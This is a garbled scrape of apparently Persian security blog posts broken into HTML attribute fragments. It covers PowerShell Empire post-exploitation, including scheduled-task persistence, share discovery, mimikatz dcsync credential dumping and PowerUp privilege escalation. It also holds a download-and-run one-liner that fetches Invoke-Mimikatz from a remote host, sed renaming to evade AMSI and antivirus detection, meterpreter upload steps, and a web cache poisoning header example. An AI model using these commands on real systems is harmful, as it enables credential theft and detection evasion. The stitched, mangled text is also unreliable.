کردpersistence56.back=”” 57.usemodule=”” elevated=”” schtasks=”” 58.set=”” onlogon=”” 59.set=”” 60.execute=”” تایمر=”” باری=”” تایمه=”” بیار,=”” پرداختnetwork=”” sharing61.back=”” 62.interact=”” 63.usemodule=”” sharefinder=”” 64.run=”” نامش=”” فولدرهای=”” شیر=”” میمونیم=”” خواسته=”” بکشه=”” کنیمadd=”” admin65.back=”” 
66.usemodule=”” mimikatz=”” dcsy=”” 67.set=”” avi\12341234=”” 68.run=”” 69.creds=”” میباشد,detected=”” bugs70.back=”” 71.usemodule=”” privesc=”” powerup=”” allchecks=”” 72.set=”” 73.execute=”” empirehttp:=”” www.powershellempire.com=”” ?page_id=”151 #Mimikatz” blocking=”” detecting=”” گیری=”” باشه…خب=”” fud=”” بشیم,=”” plaintexts=”” kerberos=”” میدهد,=”” number=”” سازگاری=”” داره,=”” تجربیاتی=”” بیاوریدopen=”” cmd1.powershell=”” “iex=”” net.webclient).downloadstring=”” (‘https:=”” powershellmafia=”” powersploit=”” raw=”” exfiltration=”” invoke-mimikatz.ps1’);invoke-mimikatz”=”” iex=”” بلاکی=”” باشه?=”” ثابت=”” نمیشود=”” کدها=”” نخواهند=”” مکانیزمی=”” هستhttps:=”” nf-amsi-amsiscanstringاین=”” just=”” مامور=”” detector=”” ثابتی=”” میدیمgo=”” invoke-mimikatz.ps1=”” invoke-mimikatz=”” invoke-mimidogz=”” invoke-mimikatz.ps1;sed=”” <#=”” #>=”” c\\’=”” ^[[:space:]]*#.*$=”” dumpcreds=”” dumpcred=”” argumentptr=”” nottodaypal=”” calldllmainsc1=”” thisisnotthestringyouarelookingfor=”” “s=”” \-win32functions=”” \$win32functions$=”” \-win32functions\$win32functions=”” #\-=”” g”=”” upload=”” تستی=”” گرفتم=”” باپیس=”” هستش…meterpreter=”” command3.upload=”” 4.execute=”” bypass”=”” 5.execute=”” import-module=”” .\invoke-mimikatz.ps1″=”” 6.execute=”” invoke-mimidogz”=”” gentilkiwi=”” releaseshttps:=”” #neanderthal=”” manبرخی=”” وحشیانه=”” بلدیست=”” سطحی=”” رفتارها=”” تخصص=”” علمی=”” فخر=”” ماست,=”” آنهایی=”” مارا=”” صرفاً=”” خواندن=”” متهم=”” هایشان=”” میگذارند:)https:=”” bvw1-lwhwab=”” ?utm_source=”ig_share_sheet&igshid=1l638b9dm1b0dhttps://www.instagram.com/p/BvW15f-H19Q/?utm_source=ig_share_sheet&igshid=z3igujdw36yxhttps://www.instagram.com/p/BvW1ydRnkDH/?utm_source=ig_share_sheet&igshid=1ud08v1vmgjao#Forecast” apocalypseنگاه=”” عمیق=”” چرایی=”” خلق=”” بشریت=”” گیرد,=”” بُعد=”” ظریف=”” اکتشاف=”” شود,=”” نیافتنی=”” رساند…سندی=”” باب=”” پیوست=”” 1355=”” شمسی=”” اینترنتی=”” نیامده=”” بود… #web=”” cache=”” poisoningدر=”” wcp=”” پرداخت=”” cdns=”” پذیری…. 
علت=”” چیست=”” بزنم=”” صوتی=”” هاردتون=”” نداشتید=”” مجبور=”” بودید=”” هرباری=”” میخواستید=”” آهنگ=”” گوش=”” میزدید=”” میکردید=”” وسیع=”” چقدر=”” میرفت,=”” caching=”” وبسایب=”” صفحاتی=”” هفته=”” معاف=”” js-css-html-jpg-svg=”” صفحات=”” مناطق=”” authenticate=”” شد,=”” مواقعی=”” کارشون=”” سرورهای=”” واسط=”” میکنند,شما=”” میخواسته=”” کمکی=”” نمیره=”” کاربران=”” موثر=”” ایرادات=”” بخشی=”” پارس=”” کاربر,=”” پارامتری=”” cache-control=”” flush=”” میکنمakamai-cloudflare-varnish-aws-fastly-nginx=”” poisoning=”” میریم,=”” requset=”” x-forwarded-host=”” داره,get=”” en?cb=”1″ www.redhat.com=”” x-forwarded-host:=”” canary=”” cache-control:=”” public,=”” no-cache=”” <meta=””>